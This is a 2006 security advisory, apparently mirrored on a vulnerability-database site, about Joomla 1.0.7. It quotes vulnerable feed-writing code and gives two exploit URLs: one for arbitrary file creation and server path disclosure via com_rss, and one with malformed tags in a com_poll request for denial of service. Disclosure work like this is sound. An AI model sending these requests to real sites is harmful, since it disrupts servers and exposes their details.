JOOMLA CMS 1.0.7 DoS & path disclosing

Advisory Content :

RST/GHC -- JOOMLA CMS -- ADVISORY #37
Product: Joomla
Affected version: 1.0.7
Last version: 1.0.7
Vendor: Joomla!
URL: http://www.joomla.org/
online demo: http://demo.joomla.org/
VULNERABILITY CLASS: DoS, path disclosing

[Product Description]
Joomla! is a Content Management System (CMS) created by the same
award-winning
team that brought the Mambo CMS to its current state of stardom.

[Summary]
An attacker can invoke some undesirable situations for server
administrator.

[Details]

1. Real server path disclose and arbitrary filename creation.
Vulnerable script: includes/feedcreator.class.php
[code]
function saveFeed($filename="", $displayContents=true) {
if ($filename=="") {
$filename = $this->_generateFilename();
}
$feedFile = fopen($filename, "w+");
if ($feedFile) {
fputs($feedFile,$this->createFeed());
fclose($feedFile);
if ($displayContents) {
$this->_redirect($filename);
}
[/code]

Exploit:
Vulnerable script: index.php?option=com_rss&feed=filename_here&no_html=1
An attacker can write simple code to soil the server by lots of cashed
files.
To disclose real path - just put slash symbol in the filename.

2. Denial of service.
Vulnerable script: includes/phpInputFilter/class.inputfilter.php
Anti-xss code will not cope with several tags. This can cause denial of
servise.
Exploit:
index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>

[DISCLOSURE TIMELINE]

09/02/06 - vendor notification
26/02/06 - new release (1.0.8) with bugfix

bugs discovered by Foster

RST/GHC
http://rst.void.ru
http://www.ghc.ru

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

JOOMLA CMS 1.0.7 DoS & path disclosing